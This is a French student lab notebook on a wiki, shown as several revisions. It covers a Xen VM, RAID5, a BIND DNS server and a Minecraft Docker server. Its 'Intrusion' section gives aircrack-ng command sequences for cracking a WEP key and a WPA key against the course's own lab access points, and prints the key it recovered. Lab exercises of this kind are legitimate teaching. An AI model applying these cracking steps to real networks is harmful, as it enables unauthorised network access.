 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton:&lt;br /&gt;
apt install mdadm&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
/dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
mount -a&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59677</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59677"/>
				<updated>2022-11-10T11:53:15Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59676</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59676"/>
				<updated>2022-11-10T11:51:59Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
